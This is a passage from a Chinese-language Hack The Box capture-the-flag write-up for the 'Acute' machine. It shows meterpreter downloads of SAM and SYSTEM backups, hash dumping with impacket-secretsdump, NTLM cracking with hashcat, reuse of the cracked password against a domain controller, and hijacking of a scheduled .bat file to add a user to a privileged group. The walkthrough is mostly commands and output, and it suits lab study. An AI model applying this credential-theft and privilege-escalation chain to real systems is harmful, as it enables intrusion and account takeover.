The operation completed successfully.
PS C:\Utils> ls
ls


    Directory: C:\Utils


Mode                 LastWriteTime         Length Name                                                                 
----                 -------------         ------ ----                                                                 
-a----        16/04/2024     16:33          68608 nc.exe                                                               
-a----        16/04/2024     15:17         770279 PowerView.ps1                                                        
-a----        16/04/2024     16:36          57344 sam.bak                                                              
-a----        16/04/2024     15:49         207360 shell.exe                                                            
-a----        16/04/2024     16:36       12140544 sys.bak                                                              
-a----        16/04/2024     15:28        2387456 winPEASx64.exe                                                       


PS C:\Utils> 

然后通过 msf 进行下载


^C
Terminate channel 1? [y/N]  
^C
Terminate channel 1? [y/N]  y
meterpreter > download sam.bak
[*] Downloading: sam.bak -> /home/kali/Desktop/sam.bak
[*] Downloaded 56.00 KiB of 56.00 KiB (100.0%): sam.bak -> /home/kali/Desktop/sam.bak
[*] Completed  : sam.bak -> /home/kali/Desktop/sam.bak
meterpreter > download sys.bak
[*] Downloading: sys.bak -> /home/kali/Desktop/sys.bak
[*] Downloaded 1.00 MiB of 11.58 MiB (8.64%): sys.bak -> /home/kali/Desktop/sys.bak
[-] Send timed out. Timeout currently 15 seconds, you can configure this with sessions --interact <id> --timeout <value>
meterpreter > download sys.bak
[*] Downloading: sys.bak -> /home/kali/Desktop/sys.bak
[*] Downloaded 1.00 MiB of 11.58 MiB (8.64%): sys.bak -> /home/kali/Desktop/sys.bak

[*] Downloaded 2.00 MiB of 11.58 MiB (17.27%): sys.bak -> /home/kali/Desktop/sys.bak
[*] Downloaded 3.00 MiB of 11.58 MiB (25.91%): sys.bak -> /home/kali/Desktop/sys.bak

[*] Downloaded 4.00 MiB of 11.58 MiB (34.55%): sys.bak -> /home/kali/Desktop/sys.bak

[*] Downloaded 5.00 MiB of 11.58 MiB (43.18%): sys.bak -> /home/kali/Desktop/sys.bak

[*] Downloaded 6.00 MiB of 11.58 MiB (51.82%): sys.bak -> /home/kali/Desktop/sys.bak
[*] Downloaded 7.00 MiB of 11.58 MiB (60.46%): sys.bak -> /home/kali/Desktop/sys.bak

[*] Downloaded 8.00 MiB of 11.58 MiB (69.1%): sys.bak -> /home/kali/Desktop/sys.bak
[*] Downloaded 9.00 MiB of 11.58 MiB (77.73%): sys.bak -> /home/kali/Desktop/sys.bak
[*] Downloaded 10.00 MiB of 11.58 MiB (86.37%): sys.bak -> /home/kali/Desktop/sys.bak
[*] Downloaded 11.00 MiB of 11.58 MiB (95.01%): sys.bak -> /home/kali/Desktop/sys.bak
[*] Downloaded 11.58 MiB of 11.58 MiB (100.0%): sys.bak -> /home/kali/Desktop/sys.bak
[*] Completed  : sys.bak -> /home/kali/Desktop/sys.bak
meterpreter >

28、开始破解密码

┌──(kali㉿offsec)-[~/Desktop]
└─$ impacket-secretsdump -sam sam.bak -system sys.bak LOCAL
Impacket v0.11.0 - Copyright 2023 Fortra

[*] Target system bootKey: 0x44397c32a634e3d8d8f64bff8c614af7
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:a29f7623fd11550def0192de9246f46b:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WDAGUtilityAccount:504:aad3b435b51404eeaad3b435b51404ee:24571eab88ac0e2dcef127b8e9ad4740:::
Natasha:1001:aad3b435b51404eeaad3b435b51404ee:29ab86c5c4d2aab957763e5c1720486d:::
[*] Cleaning up...

┌──(kali㉿offsec)-[~/Desktop]
└─$ touch hash       
                                                                                                                                                                                        
┌──(kali㉿offsec)-[~/Desktop]
└─$ sudo hashcat -m 1000 ./hash /usr/share/wordlists/rockyou.txt
[sudo] kali 的密码：
hashcat (v6.2.6) starting

OpenCL API (OpenCL 3.0 PoCL 5.0+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 15.0.7, SLEEF, POCL_DEBUG) - Platform #1 [The pocl project]
==========================================================================================================================================
* Device #1: cpu--0x000, 1439/2942 MB (512 MB allocatable), 4MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 5 digests; 4 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Early-Skip
* Not-Salted
* Not-Iterated
* Single-Salt
* Raw-Hash

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

31d6cfe0d16ae931b73c59d7e0c089c0:                         
a29f7623fd11550def0192de9246f46b:Password@123             
Approaching final keyspace - workload adjusted.           

                                                          
Session..........: hashcat
Status...........: Exhausted
Hash.Mode........: 1000 (NTLM)
Hash.Target......: ./hash
Time.Started.....: Wed Apr 17 07:30:42 2024 (3 secs)
Time.Estimated...: Wed Apr 17 07:30:45 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  5461.1 kH/s (0.05ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 2/4 (50.00%) Digests (total), 2/4 (50.00%) Digests (new)
Progress.........: 14344385/14344385 (100.00%)
Rejected.........: 0/14344385 (0.00%)
Restore.Point....: 14344385/14344385 (100.00%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: $HEX[206b72697374656e616e6e65] -> $HEX[042a0337c2a156616d6f732103]
Hardware.Mon.#1..: Util: 42%

Started: Wed Apr 17 07:30:41 2024
Stopped: Wed Apr 17 07:30:46 2024

29、它破解了Guest（普通）的空密码和Administrator的“Password@123”。

1
2
3

Administrator

Password@123

30、啊哈！密码重复使用？也许有域用户重复使用了该密码？让我们在edavies反向 shell 会话上对域控制器进行密码喷射！在我的第一次尝试中，域用户awallace成功了！

PS C:\Utils> $pass = ConvertTo-SecureString "Password@123" -AsPlainText -Force
$pass = ConvertTo-SecureString "Password@123" -AsPlainText -Force
PS C:\Utils> $cred = New-Object System.Management.Automation.PSCredential("ACUTE\awallace", $pass)
$cred = New-Object System.Management.Automation.PSCredential("ACUTE\awallace", $pass)
PS C:\Utils> Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
Invoke-Command -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred -ScriptBlock { whoami }
acute\awallace
PS C:\Utils>

31、添加awallace，鉴于.batLois 每五分钟运行一次脚本，我将编写一个脚本来添加 awallace Site_Admin：

PS C:\Utils> Invoke-Command -ScriptBlock { Set-Content -Path '\program files\keepmeon\0xdf.bat' -Value 'net group site_admin awallace /add /domain'} -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { Set-Content -Path '\program files\keepmeon\0xdf.bat' -Value 'net group site_admin awallace /add /domain'} -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
PS C:\Utils> Invoke-Command -ScriptBlock { cat '\program files\keepmeon\0xdf.bat' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred 
Invoke-Command -ScriptBlock { cat '\program files\keepmeon\0xdf.bat' } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred 
net group site_admin awallace /add /domain
PS C:\Utils>

32、等待过个分钟后，我成功了读取到了flag信息

PS C:\Utils> Invoke-Command -ScriptBlock { cat \users\administrator\desktop\root.txt  } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
Invoke-Command -ScriptBlock { cat \users\administrator\desktop\root.txt  } -ComputerName ATSSERVER -ConfigurationName dc_manage -Credential $cred
9cce45e48fdb55bd12962d4a7b4691bc
PS C:\Utils>

0x03 通关凭证展示

https://www.hackthebox.com/achievement/machine/1705469/438

打靶记

#shooting-range

Acute-htb-writeup

https://sh1yan.top/2024/04/16/Acute-htb-writeup/

作者

shiyan

发布于

2024年4月16日

许可协议

Busqueda-htb-writeup 上一篇

Object-htb-writeup 下一篇